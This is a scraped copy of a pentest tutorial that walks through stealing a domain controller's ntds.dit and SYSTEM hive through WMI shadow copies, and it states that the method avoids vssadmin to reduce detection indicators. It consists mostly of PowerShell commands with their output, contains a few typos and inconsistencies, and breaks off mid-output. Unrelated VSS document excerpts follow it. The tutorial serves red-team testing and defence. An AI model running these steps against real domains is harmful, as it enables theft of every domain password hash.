DOCSLIB.ORG

Getting Started with WMI Weaponization – Part 4

Total Page:16

File Type:pdf, Size:1020Kb

Download full-text PDF Read full-text
Getting Started with WMI Weaponization – Part 4 Getting Started with WMI Weaponization – Part 4 written by Alexander Polce Leary | April 13, 2017 Stealing the NTDS.dit File Remotely using the WMI Win32_ShadowCopy Class Dumping password hashes is a pretty common task during pentest and red team engagements. For domain controllers, it can be done a number of different ways including, but not limited to, DCSync (drsuapi), lsadump, and parsing the ntds.dit directly. Sean Metcalf has already covered how to execute the password hash recovery both locally and remotely in an amazing blog. Each with its own set of IoCs. In this post I’ll cover yet another method for recovering the ntds.dit file remotely using WMI Volume Shadow Copy methods, but the methods described here could also be used to retrieve local password hashes from the SAM and SYSTEM file. Please note the technique described here does require domain administrative privileges. Why would I use this technique? On the whole, this technique will provide penetration testers with another means of dumping the ntds.dit via volume shadow copies without having to call the vssadmin.exe tool. This helps to decrease the number of indicator related to the attack. Testing with this method can also help to push against blue team’s defense to make sure they can identify slight variations on this common attack. Let’s See Some Command Examples Let’s just jump right into it. Below are the PowerShell WMI commands to dump the ntds from a remote domain controller using the Win32_ShadowCopy class functions. 1. First, map the c$ of the target domain controller. This isn’t required, but can simplify the process. PS C:\windows\system32> New-PSDrive -Name "S" -Root "\\10.1.1.1\c$" -PSProvider "FileSystem" Name Used (GB) Free (GB) Provider Root ---- --------- --------- -------- --- - S FileSystem \\10.1.1.1\c$ PS C:\windows\system32> cd s: PS S:\> ls Directory: \\10.1.1.1\c$ Mode LastWriteTime Length Name ---- ------------- ------ ---- d---- 2/13/2015 8:27 PM PerfLogs d-r-- 8/26/2016 8:00 PM Program Files d-r-- 6/13/2016 7:00 PM Program Files (x86) d-r-- 12/5/2016 2:38 PM Users d---- 2/5/2017 4:16 PM Windows 2. Then, create a shadow copy of the C:\ drive on the remote domain controller using the Win32_ShadowCopy“ ” class. Note that the new shadow copy has a unique “ShadowId”. PS S:\> $wmi = Invoke-WmiMethod -Class Win32_ShadowCopy -Name Create -ArgumentList 'ClientAccessible','C:\' - ComputerName 10.1.1.1 PS S:\> $wmi __GENUS : 2 __CLASS : __PARAMETERS __SUPERCLASS : __DYNASTY : __PARAMETERS __RELPATH : __PROPERTY_COUNT : 2 __DERIVATION : {} __SERVER : __NAMESPACE : __PATH : ReturnValue : 0 ShadowID : {7DE8D573-A8BFB-41E6-92F6- A34938E432FC} PSComputerName : 3. Next, convert the “ShadowId” to a string and use it to query the domain controller for more information about the shadow copy. Specifically, we want the “DeviceObject”. This will give us the path to our newly created shadow copy. PS S:\> $ShadowID = $wmi.ShadowID.ToString() PS S:\> $ShadowID {7DE8D573-A8FB-41E6-92F6-A34938E432FC} PS S:\> $ShadowCopy = Get-WmiObject -Query "SELECT DeviceObject FROM Win32_ShadowCopy WHERE ID = '$ShadowID'" -ComputerName 10.1.1.1 PS S:\> $ShadowCopy __GENUS : 2 __CLASS : Win32_ShadowCopy __SUPERCLASS : __DYNASTY : __RELPATH : __PROPERTY_COUNT : 1 __DERIVATION : {} __SERVER : __NAMESPACE : __PATH : DeviceObject : \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1621 PSComputerName : 4. Next, convert the “DeviceObject” to a string so it can be used in future WMI queries. PS S:\> $DeviceObject = $ShadowCopy.DeviceObject.ToString() PS S:\> $DeviceObject \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1621 5. Now copy the ntds.dit directly from the shadow copy path on the domain controller using the WMI “Win32_Process” class. By default, the ntds.dit can be stored in both the C:\Windows\NTDS and C:\Windows\System32\ directories. Below are example commands for both. PS S:\> Invoke-WmiMethod -Class Win32_Process -Name create -ArgumentList "cmd.exe /c copy $DeviceObject\Windows\System32\ntds.dit C:\" - ComputerName 10.1.1.1 PS S:\> Invoke-WmiMethod -Class Win32_Process -Name create -ArgumentList "cmd.exe /c copy $DeviceObject\Windows\NTDS\ntds.dit C:\" -ComputerName 10.1.1.1 PS S:\> Copy-Item S:\ntds.dit C:\ PS S:\> Remove-Item S:\ntds.dit PS S:\> Invoke-WmiMethod -Class Win32_Process -Name create -ArgumentList "cmd.exe /c copy $DeviceObject\Windows\System32\config\SYSTEM C:\" - ComputerName 10.1.1.1 PS S:\> Copy-Item S:\SYSTEM.dit C:\ PS S:\> Remove-Item S:\SYSTEM PS S:\> Set-Location C:\ PS C:\> Remove-PSDrive S But what if the ntds.dit file isn’t stored on the C drive? Surprise! Sometimes admins put system files in strange places. If you can’t find the ntds.dit in its default locations, you can determine where it’s hiding by looking in the registry. Below I’ll show how to use PowerShell Remoting to look up the alternative location and dump the ntds.dit. 1. To prep our box we are going to enable PowerShell Remoting, enabled the WinRM service, and set the domain controller as a trusted host. PS C:\> Enable-PSRemoting –Force –SkipNetworkProfileCheck PS C:\> Start-Service WinRM WinRM Security Configuration. This command modifies the TrustedHosts list for the WinRM client. The computers in the TrustedHosts list might not be authenticated. The client might send credential information to these computers. Are you sure that you want to modify this list? [Y] Yes [N] No [S] Suspend [?] Help (default is "Y"): Y 2. Now start a new PowerShell Remoting session to the domain controller. From there we can grab the location of the elusive non-standard ntds.dit file path. PS C:\> Enter-PSSession 10.1.1.1 [10.1.1.1]: PS C:\Users\admin\Documents> Set-Location C:\ [10.1.1.1]: PS C:\> $DitPath = (Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters -Name "DSA Database file").'DSA Database file' [10.1.1.1]: PS C:\> $DitPath D:\NTDS\ntds.dit This could also be done remotely via WMI PS C:\> $Hive = [uint32]2147483650 PS C:\> $Key = "SYSTEM\\CurrentControlSet\\Services\\NTDS\Parameters" PS C:\> $Value = "DSA Database File" PS C:\> $DitPath = (Invoke-WmiMethod -Class StdRegProv -Name GetStringValue -ArguementList $Hive, $Key, $Value - ComputerName 10.1.1.1).sValue PS C:\> $DitPath D:\NTDS\ntds.dit 3. Now that we have the path we’ll create our shadow copy and grab the “DeviceObject” so we can copy the file off. [10.1.1.1]: PS C:\> $DitRelativePath = $DitPath.Split("\")[1..($DitPath.Length)] -Join "\" [10.1.1.1]: PS C:\> $wmi = Invoke-WmiMethod -Class Win32_ShadowCopy -Name Create -ArgumentList 'ClientAccessible','F:\' [10.1.1.1]: PS C:\> $wmi __GENUS : 2 __CLASS : __PARAMETERS __SUPERCLASS : __DYNASTY : __PARAMETERS __RELPATH : __PROPERTY_COUNT : 2 __DERIVATION : {} __SERVER : __NAMESPACE : __PATH : ReturnValue : 0 ShadowID : {A6EAFEDD-8FB2-4EBE-A13B- C992C7E2E265} PSComputerName : [10.1.1.1]: PS C:\> $ShadowID = $wmi.ShadowID.ToString() {A6EAFEDD-8FB2-4EBE-A13B-C992C7E2E265} [10.1.1.1]: PS C:\> $ShadowCopy = Get-WmiObject -Class Win32_ShadowCopy -Property DeviceObject -Filter "ID = '$($wmi.ShadowID)'" [10.1.1.1]: PS C:\> $ShadowCopy __GENUS : 2 __CLASS : Win32_ShadowCopy __SUPERCLASS : __DYNASTY : __RELPATH : __PROPERTY_COUNT : 1 __DERIVATION : {} __SERVER : __NAMESPACE : __PATH : DeviceObject : \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1641 PSComputerName : [10.1.1.1]: PS C:\> $DeviceObject = $ShadowCopy.DeviceObject.ToString() [10.1.1.1]: PS C:\> $DeviceObject \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1641 4. The powershell native Copy-Item fails to retrieve the file from the VolumeShadow Copy snapshot. So we are going to get fancy with our file copy to change it up a little. First we are going to get the runtime version and directory of .net. [10.1.1.1]: PS C:\> $mscorlib = [System.Reflection.Assembly]::LoadFile("$([System.Runtim e.InteropServices.RuntimeEnvironment]::GetRuntimeDirecto ry())mscorlib.dll") [10.1.1.1]: PS C:\> $mscorelib GAC Version Location --- ------- -------- True v4.0.30319 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorl.. 5. Next, we instantiate an object from the “Win32.Win32Native” class. [10.1.1.1]: PS C:\> $Win32Native = $mscorlib.GetType(‘Microsoft.Win32.Win32Native’) [10.1.1.1]: PS C:\> $Win32Native IsPublic IsSerial Name BaseType -------- -------- ---- -------- False False Win32Native System.Object 6. This object will then be used to call the native “CopyFile”. [10.1.1.1]: PS C:\> $CopyFile = $Win32Native.GetMethod(‘CopyFile’, ([Reflection.BindingFlags] ‘NonPublic, Static’)) [10.1.1.1]: PS C:\> $CopyFile Name : CopyFile DeclaringType : Microsoft.Win32.Win32Native ReflectedType : Microsoft.Win32.Win32Native MemberType : Method MetadataToken : 100677580 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : True IsSecuritySafeCritical : False IsSecurityTransparent : False MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Assembly, Static, HideBySig, PinvokeImpl CallingConvention : Standard ReturnType : System.Boolean ReturnTypeCustomAttributes : Boolean ReturnParameter : Boolean IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : PreserveSig IsPublic : False IsPrivate : False IsFamily : False IsAssembly : True IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : True IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[System.Runtime.InteropServices.DllImportAttribut e("kernel32.dll", EntryPoint = "CopyFile", CharSet = 4, ExactSpelling =
Load more

Recommended publications
  • Journey Through the Impact of the Recovery Artifacts in Windows 8 WENDELL Kenneth JOHNSON Iowa State University
    Iowa State University Capstones, Theses and Graduate Theses and Dissertations Dissertations 2013 Journey through the impact of the recovery artifacts in Windows 8 WENDELL Kenneth JOHNSON Iowa State University Follow this and additional works at: https://lib.dr.iastate.edu/etd Part of the Databases and Information Systems Commons Recommended Citation JOHNSON, WENDELL Kenneth, "Journey through the impact of the recovery artifacts in Windows 8" (2013). Graduate Theses and Dissertations. 13414. https://lib.dr.iastate.edu/etd/13414 This Thesis is brought to you for free and open access by the Iowa State University Capstones, Theses and Dissertations at Iowa State University Digital Repository. It has been accepted for inclusion in Graduate Theses and Dissertations by an authorized administrator of Iowa State University Digital Repository. For more information, please contact [email protected]. Journey through the impact of the recovery artifacts in Windows 8 by Wendell Kenneth Johnson A thesis submitted to the graduate faculty in partial fulfillment of the requirements for the degree of MASTER OF SCIENCE Co-majors: Computer Engineering; Information Assurance Program of Study Committee: Yong Guan, Major Professor Doug Jacobson Jennifer L. Davidson Iowa State University Ames, Iowa 2013 Copyright © Wendell Kenneth Johnson, 2013. All rights reserved. ii DEDICATION This Thesis is dedicated to my family Jessica, Savannah and Brady. Without your unrelenting support and sacrifices I would not have been able to follow my educational and career dreams. To Lee Adams, while you will never see the finished work, your guiding light and compassion shown to me helped create the person I am today. My drive to succeed and to share my success comes from watching you give so much of your compassion to others.
    [Show full text]
  • How to Re-Register Vss Dll Binaries (32 Bit)
    QBR Knowledge base HOW TO RE-REGISTER VSS DLL BINARIES (32 BIT) SCOPE The command vssadmin list writers does not produce an output then following commands will help to re-register the VSS Service's associated DLL binaries. There may be other reasons in which QBR support may also ask to run this batch file besides the inability to list the VSS Writers of the OS. One of the most common causes for needing to perform these steps is that there has been a conflicting VSS-aware application being run on the protected machine. Please ensure that any other VSS-aware process is removed, including scheduled shadow copies in the OS, this will ensure further long term stability and reliability for the SnapToVM Agent to perform. Please note this will only work on 32bit systems, if you have a 64 bit system there is a separate article on this KB for you. TO RE-REGISTER VSS BINARIES AND SERVICES Run the following commands from within cmd.exe running with Administrative privileges cd /d %windir%\system32 net stop vss net stop swprv regsvr32 ole32.dll regsvr32 oleaut32.dll regsvr32 /i eventcls.dll <--This will fail to register on Vista & 2008 and newer which is OK regsvr32 vss_ps.dll vssvc /register regsvr32 /i swprv.dll regsvr32 es.dll <-- This will fail to register on Vista & 2008 and newer which is OK regsvr32 stdprov.dll regsvr32 vssui.dll <-- This only applies to server2003\server2008 regsvr32 msxml.dll <---This may not be installed and may fail to register which is OK regsvr32 msxml3.dll <---This may not be installed and may fail to register which is OK regsvr32 msxml4.dll <---This may not be installed and may fail to register which is OK Please reboot the machine if you have any trouble testing the VSS with the VShadow tool below.
    [Show full text]
  • Tweakhound, Windows 7 Beta Default Services
    Sheet1 Name Startup Type Adaptive Brightness Manual AppID Service Manual Application Experience Manual Application Information Manual Application Layer Gateway Service Manual Application Management Manual Background Intelligent Transfer Service Automatic (Delayed Start) Base Filtering Engine Automatic BitLocker Drive Encryption Service Manual Block Level Backup Engine Service Manual Bluetooth Support Service Manual BranchCache Manual Certificate Propagation Manual CNG Key Isolation Manual COM+ Event System Automatic COM+ System Application Manual Computer Browser Automatic Credential Manager Service Manual Cryptographic Services Automatic DCOM Server Process Launcher Automatic Desktop Window Manager Session Manager Automatic DHCP Client Automatic Diagnostic Policy Service Automatic Diagnostic Service Host Manual Diagnostic System Host Manual Disk Defragmenter Manual Distributed Link Tracking Client Automatic Distributed Transaction Coordinator Manual DNS Client Automatic Encrypting File System (EFS) Manual Extensible Authentication Protocol Manual Fax Manual Function Discovery Provider Host Manual Function Discovery Resource Publication Automatic Group Policy Client Automatic Health Key and Certificate Management Manual HomeGroup Listener Manual HomeGroup Provider Manual Human Interface Device Access Manual IKE and AuthIP IPsec Keying Modules Automatic Interactive Services Detection Manual Internet Connection Sharing (ICS) Disabled IP Helper Automatic IPsec Policy Agent Manual KtmRm for Distributed Transaction Coordinator Manual Link-Layer
    [Show full text]
  • Empowering Users to Restore Files with Shadow Copies on Amazon Fsx for Windows File Server
    Empowering Users to Restore Files with Shadow Copies on Amazon FSx for Windows File Server Dean Suzuki, Senior Solution Architect, AWS February 2020 © 2020, Amazon Web Services, Inc. or its affiliates. All rights reserved. Scenario • User deletes one of their files stored on the server, OR • User makes a bunch of changes to their file (e.g. contract, report, spreadsheet), and saves it. Then they decide that they want to revert back to the original file. Result: • User calls Help Desk to restore the file from backup. Better Solution: • User restores the file(s) themselves. [Windows Shadow Copies] © 2020, Amazon Web Services, Inc. or its affiliates. All rights reserved. Agenda • Demo Shadow Copies on Amazon FSx for Windows File Server • Walk through how to setup Shadow Copies on Amazon FSx for Windows File Server © 2020, Amazon Web Services, Inc. or its affiliates. All rights reserved. Shadow Copies on Amazon FSx for Windows File Server Demo © 2020, Amazon Web Services, Inc. or its affiliates. All rights reserved. Key Points • Can have up to 512 shadow copies per file system • By default, shadow copies are set to consume a maximum of 10% of the total storage capacity. © 2020, Amazon Web Services, Inc. or its affiliates. All rights reserved. Setting up Shadow Copies: Prerequisites • Need a Windows client that has network connectivity to the Amazon FSx for Windows File Server file system. • Login to the Windows client with a user that has rights. • If using AWS Managed Microsoft Active Directory (AD), member of AWS Delegated FSx Administrators or • If using Self Managed Microsoft AD, the Domain Admins or the custom group that has permissions to manage Amazon FSx for Windows File Server © 2020, Amazon Web Services, Inc.
    [Show full text]
  • Scheduling Operations in Networker
    Scheduling Operations in NetWorker Aaron Kleinsmith EMC Proven Professional Knowledge Sharing 2010 Aaron Kleinsmith P&E Consultant, EMC Education EMC² [email protected] Table of Contents Scheduling in NetWorker .................................................................................................... 3 Different ways to start backups .......................................................................................... 3 Group resource ............................................................................................................... 3 Scheduling the Group backups ......................................................................................... 4 On-demand Group backup ................................................................................................ 5 Restarting a Group backup ............................................................................................... 5 Savegrp ............................................................................................................................. 6 Savefs and save ............................................................................................................. 8 Windows Task Scheduler or Unix/Linux cron ................................................................. 9 External scheduling applications .................................................................................... 9 Using Schedules effectively ...............................................................................................
    [Show full text]
  • HP Storageworks Fast Recovery Solutions: User's Guide
    HP StorageWorks Fast Recovery Solution for Windows 2003 user guide Microsoft Exchange 2003 Microsoft SQL 2000 product version: 2.00.00 second edition (June 2004) part number: B9552-96003 This guide describes how to use the fast recovery solution with Microsoft Exchange 2003 and Microsoft SQL 2000 © Copyright 2004, Hewlett-Packard Development Company, L.P. All rights reserved. Hewlett-Packard Company makes no warranty of any kind with regard to this material, including, but not limited to, the implied warranties of merchantability and fitness for a particular purpose. Hewlett-Packard shall not be liable for errors contained herein or for incidental or consequential damages in connection with the furnishing, performance, or use of this material. This document contains proprietary information, which is protected by copyright. No part of this document may be photocopied, reproduced, or translated into another language without the prior written consent of Hewlett-Packard. The information contained in this document is subject to change without notice. Microsoft®, Windows® and MS Windows® are U.S. registered trademarks of Microsoft Corp. All other product names mentioned herein may be trademarks of their respective companies. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information is provided “as is” without warranty of any kind and is subject to change without notice. The warranties for Hewlett-Packard Company products are set forth in the express limited warranty statements
    [Show full text]
  • Brightstor Arcserve Backup for Windows Volume Shadow Copy
    BrightStor® ARCserve® Backup for Windows Volume Shadow Copy Service Guide r11.5 D01191-1E This documentation and related computer software program (hereinafter referred to as the "Documentation") is for the end user's informational purposes only and is subject to change or withdrawal by Computer Associates International, Inc. ("CA") at any time. This documentation may not be copied, transferred, reproduced, disclosed or duplicated, in whole or in part, without the prior written consent of CA. This documentation is proprietary information of CA and protected by the copyright laws of the United States and international treaties. Notwithstanding the foregoing, licensed users may print a reasonable number of copies of this documentation for their own internal use, provided that all CA copyright notices and legends are affixed to each reproduced copy. Only authorized employees, consultants, or agents of the user who are bound by the confidentiality provisions of the license for the software are permitted to have access to such copies. This right to print copies is limited to the period during which the license for the product remains in full force and effect. Should the license terminate for any reason, it shall be the user's responsibility to return to CA the reproduced copies or to certify to CA that same have been destroyed. To the extent permitted by applicable law, CA provides this documentation "as is" without warranty of any kind, including without limitation, any implied warranties of merchantability, fitness for a particular purpose or noninfringement. In no event will CA be liable to the end user or any third party for any loss or damage, direct or indirect, from the use of this documentation, including without limitation, lost profits, business interruption, goodwill, or lost data, even if CA is expressly advised of such loss or damage.
    [Show full text]
  • Snapdrive 7.1 for Windows Administration Guide for SMB 3.0 Environments
    SnapDrive® 7.1 for Windows® Administration Guide For SMB 3.0 Environments November 2019 | 215-08798_C0 [email protected] Table of Contents | 3 Contents SnapDrive overview ...................................................................................... 5 New features in SnapDrive 7.1.4 for Windows ........................................................... 5 Automated storage provisioning and data management using SnapDrive for Windows ................................................................................................................ 5 SnapDrive PowerShell cmdlet environment support at a glance ................................. 6 Understanding SnapDrive for Windows components ................................................. 7 Understanding the Volume Shadow Copy Service ...................................................... 8 Configuring remote VSS for SnapDrive for Windows SMB environments ................ 8 Virtual storage server configuration considerations ................................. 9 Managing storage system access for SnapDrive ...................................... 10 Setting up storage system access for SnapDrive ....................................................... 10 Setting and using default storage system connection settings ................................... 11 Support for mixed LIFs in SMB 3 environments ...................................................... 12 Removing storage system connection settings .......................................................... 12 Provisioning volumes and
    [Show full text]
  • Microsoft Volume Shadow Copy Service Guide
    Arcserve® Backup for Windows Microsoft Volume Shadow Copy Service Guide r17.5 This Documentation, which includes embedded help systems and electronically distributed materials, (hereinafter referred to as the “Documentation”) is for your informational purposes only and is subject to change or withdrawal by Arcserve at any time. This Documentation may not be copied, transferred, reproduced, disclosed, modified or duplicated, in whole or in part, without the prior written consent of Arcserve. This Documentation is confidential and proprietary information of Arcserve and may not be disclosed by you or used for any purpose other than as may be permitted in (i) a separate agreement between you and Arcserve governing your use of the Arcserve software to which the Documentation relates; or (ii) a separate confidentiality agreement between you and Arcserve. Notwithstanding the foregoing, if you are a licensed user of the software product(s) addressed in the Documentation, you may print or otherwise make available a reasonable number of copies of the Documentation for internal use by you and your employees in connection with that software, provided that all Arcserve copyright notices and legends are affixed to each reproduced copy. The right to print or otherwise make available copies of the Documentation is limited to the period during which the applicable license for such software remains in full force and effect. Should the license terminate for any reason, it is your responsibility to certify in writing to Arcserve that all copies and partial copies of the Documentation have been returned to Arcserve or destroyed. TO THE EXTENT PERMITTED BY APPLICABLE LAW, ARCSERVE PROVIDES THIS DOCUMENTATION “AS IS” WITHOUT WARRANTY OF ANY KIND, INCLUDING WITHOUT LIMITATION, ANY IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR NONINFRINGEMENT.
    [Show full text]
  • Copyrighted Material
    32_185926 bindex.qxp 10/17/07 10:50 AM Page 341 Index advanced network configuration, 236 • Symbols • Anonymous Logon, 124 + Add icon, 62, 86 Antivirus Out of Date warning, 330 Apple DRM, 101 iPods, 108 • A • iTunes, 110–111 Macs, 17 AAC audio files, 101 Application filter, 283 Access Denied errors, 84 applications access permissions, 83–84, 87, 89–90, ActiveX control, 190 117, 278 Dynamic Host Configuration Protocol Acronis True Image, 256 (DHCP), 187 ActiveX control program, 190 Home Computer Restore Add a Hard Drive Wizard, 299, 311 burning CD from server, 238–239 Add a Printer Wizard, 286 overview, 229–230 Add a Shared Folder dialog box, 86–87, 116 restoring hard drive, 231–238 Add Folder dialog box, 104–105, 108 restrictions, 230–231 Add Photo to Gallery dialog box, 156 LogMeIn, 199 Add to Library dialog box, 104–106 Program Launcher, 334 Add User Account dialog box, 62 RebuildPrimary, 314, 316 adding hard drives Windows Safely Remove Hardware, 234 external, 300–302 Are you sure? dialog box, 104 internal, 297–300 AskWoody.com, 5 knowing when, 294–297 At Risk network health reports, 273 overview, 293–294 audio files, 101, 108–109, 131 add-ins Automatic Backup Management, 222 finding, 339 automatic backups, 208 installation files, 307 Automatic File Backup, 214 installing/uninstalling, 332–334 automatic updating feature, 51–52 Add-Ins folder, 332 AutoPlay dialog box, 47, 156 Administrator account COPYRIGHTEDAutoPlay MATERIAL notification, 261 accessibility, 277 AVG Free, 330 automatically generated user folder, 79 changing passwords,
    [Show full text]
  • How to Re-Register Vss Dll Binaries (64 Bit)
    QBR Knowledge base HOW TO RE-REGISTER VSS DLL BINARIES (64 BIT) SCOPE If the command vssadmin list writers does not have any output the following batch file will help to re-register the VSS Service's associated DLL binaries. There may be other reasons in which QBR support may also ask to run this batch file besides the inability to list the VSS Writers of the OS. Please note this will only work on 64bit systems, if you have a 32 bit system there is a separate article on this KB for you. COPY THIS TEXT INTO NOTEPAD AND SAVE AS FIXVSS08.BAT Then run this batch file with administrative privileges. rem FILENAME: FIXVSS08.BAT rem net stop "System Event Notification Service" net stop "Background Intelligent Transfer Service" net stop "COM+ Event System" net stop "Microsoft Software Shadow Copy Provider" net stop "Volume Shadow Copy" cd /d %windir%\system32 net stop vss net stop swprv regsvr32 /s ATL.DLL regsvr32 /s comsvcs.DLL regsvr32 /s credui.DLL regsvr32 /s CRYPTNET.DLL QBR Knowledge base regsvr32 /s CRYPTUI.DLL regsvr32 /s dhcpqec.DLL regsvr32 /s dssenh.DLL regsvr32 /s eapqec.DLL regsvr32 /s esscli.DLL regsvr32 /s FastProx.DLL regsvr32 /s FirewallAPI.DLL regsvr32 /s kmsvc.DLL regsvr32 /s lsmproxy.DLL regsvr32 /s MSCTF.DLL regsvr32 /s msi.DLL regsvr32 /s msxml3.DLL regsvr32 /s ncprov.DLL regsvr32 /s ole32.DLL regsvr32 /s OLEACC.DLL regsvr32 /s OLEAUT32.DLL regsvr32 /s PROPSYS.DLL regsvr32 /s QAgent.DLL regsvr32 /s qagentrt.DLL regsvr32 /s QUtil.DLL regsvr32 /s raschap.DLL regsvr32 /s RASQEC.DLL regsvr32 /s rastls.DLL QBR Knowledge base regsvr32
    [Show full text]
  • Volume Shadow Copy Service Set to Manual
    Volume shadow copy service set to manual Actually, the VSS (Volume Shadow Copy Service) needs to be set as automatic. And the reason behind it is to get the System restore to Volume shadow copy. However, after putting the service on manual or automatic it goes . for the Volume Shadow Copy service which was set on disabled results from My new Windows 7 computer came with Volume Shadow Copy set to Manual Startup. This is seen when running the Services 5 (access denied) when starting Volume Shadow. Volume Shadow Copy service not set to automatic start on installation There is no reason to have it set to anything but Manual. My Computer. This behavior is not unique to the VSS service but is much the same for as needed is not universal to services set as Manual startup but only. Shadow Copy is a technology included in Microsoft Windows that allows taking manual or automatic backup copies or snapshots of computer files or volumes, even when they are in use. It is implemented as a Windows service called the Volume Shadow Copy . System Restore allows reverting to an entire previous set of shadow copies. Windows 7 Home Premium, Manual (Started), Manual. Windows 7 Dependencies. What service Volume Shadow Copy needs to function properly. Note: While the Volume Shadow Copy service and System Restore are Whether I set VSS Service to Manual or Automatic, it turns itself off. Open Services, click Start>Run> and Verify that the Volume Shadow Copy and Microsoft Shadow Copy services are set to Manual. Altaro VM Backup has the ability to coordinate with VSS to back up and “Volume Shadow Copy” services must at least be set to Manual.
    [Show full text]